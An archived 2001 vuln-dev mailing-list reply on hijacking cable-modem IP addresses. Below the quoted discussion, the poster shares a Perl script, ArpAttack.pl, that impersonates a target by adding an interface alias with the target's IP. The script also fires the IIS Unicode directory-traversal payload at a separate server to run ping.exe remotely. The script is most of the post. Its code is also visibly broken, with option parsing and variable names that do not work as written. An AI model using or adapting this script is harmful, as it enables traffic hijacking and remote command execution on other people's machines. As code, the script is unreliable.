Vulnerability Development mailing list archives
Re: Hijack IP Address using cable modem
From: cdowns <cdowns () SKILLSOFT COM>
Date: Wed, 28 Mar 2001 21:32:24 -0500
Patrick Patterson wrote:
-----BEGIN PGP SIGNED MESSAGE----- I think I see where Patrick was coming from with this: Victim turns on his computer, and gets an IP address Cracker, while sniffing the Cable segment notices that IP adress foo is assigned to MAC bar Cracker changes his own MAC address to bar, and brings up IP address foo on this new MAC address (some Ethernet cards have overwritable MAC addresses) Since both Cracker and Victim have the same MAC, Cracker get's all packets for Victims computer, and is able to impersonate victim. This is just a slightly more sophisticated IP Address Spoofing attack.... and I don't think it will work...From what I know of Cablemodem networks, there are actually several parts.1: The cable network - the 'Modem' talks to the Cable Company terminal equipment and ensures that you are a valid subscriber. 2: The IP Network - the routers keep track of which IP and MAC, is on which Cable Modem - thus making this attack unlikely to succeed.... I haven't tested this, and might be horribly wrong, but I don't think so - this is one of those things that looks better in theory than in practice - Is anyone from @HOME or ATT around to confirm/deny what's I've written? On Wednesday 28 March 2001 09:09, Nick Summy wrote:Now I hardly know anything about this subject, so correct me If im wrong, but I have a few questions.<SNIP> - -- Patrick Patterson Tel: +1 514 485-0789 President, Chief Security Architect Fax: +1 514 485-4737 Carillon Information Security Inc. E-Mail: ppatterson () carillonis com - ----------------- The New Sound of Network Security ----------------- << http://www.carillonis.com >>
i tried this today on my company LAN and it worked perfect.. had to do some adjusting but worked so, im writing a little perl script right now and its almost done. just will use uni-code server to execute the icmp request to the spoofed machine in progress. # --------------------------------------------- # This program was inspired by a thread that started on vuln-dev () securityfocus com # most cable networks have ARP Broadcasts enabled so arp spoofing works on that network # this is a proof of concept program and is intended for educational purposes only therefore ! # i am not responsible for anything bad or just plain evil done with this program. # enough said you know the rules. # -D system ("clear"); use LWP::Simple; use Getopt::Std; getopts("tnbu:?",\%args); if ( $args{t} ) { $target = $args{t}; } else { Usage(); } if ( $args{"?"} ){ Usage(); } # <--------------------------------------- ## thisis where we need to create a network alias on the local machine\ ## for the network target we would like to spoof. ## we will cheat for now and use system calls just for the sake of getting something that works.... if ( $args{n} ) { $netmask = $args{n}; } if ( $args{b} ) { $broadcast = $args{b}; } print "creating network alias .... \n"; sleep 2; # system call here. system ("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast"); print ("ifconfig eth0:0 interface for spoof... .\n"); print ("----------------------------------------\n"); system ("/sbin/ifconfig eth0:0"); # use uni-code server for icmp to spoofed host. # <--------------------------------------- print "not here \n"; if ( $args{u} ) { $uni_target = get("http://$uni_target/scripts/..%c0%af../winnt/system32/ping.exe?+$target"); print ("reply from $uni_test\n"); } # <--------------------------------------- sub Usage { print <<USAGE; Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server> -? this menu -t <target to spoof> -n netmask -b broadcast -u uni-code server to use Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u 192.168.20.x Note: this program needs to be run as root USAGE exit; } -D
Current thread:
- Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Nick Summy (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Patterson (Mar 28)
- Re: Hijack IP Address using cable modem cdowns (Mar 28)
- Re: Hijack IP Address using cable modem Larry W. Cashdollar (Mar 28)
- Re: Hijack IP Address using cable modem Bill Munger (Mar 29)
- Re: Hijack IP Address using cable modem Mathias Wegner (Mar 28)
- Re: Hijack IP Address using cable modem Dick Visser (Mar 28)
- Re: Hijack IP Address using cable modem Reb (Mar 29)
- Re: Hijack IP Address using cable modem Patrick Patterson (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Nick Summy (Mar 29)
- Re: Hijack IP Address using cable modem David Laganière (Mar 29)
- Re: Hijack IP Address using cable modem Clayton Hoskinson (Mar 29)
- Re: Hijack IP Address using cable modem Nick Summy (Mar 28)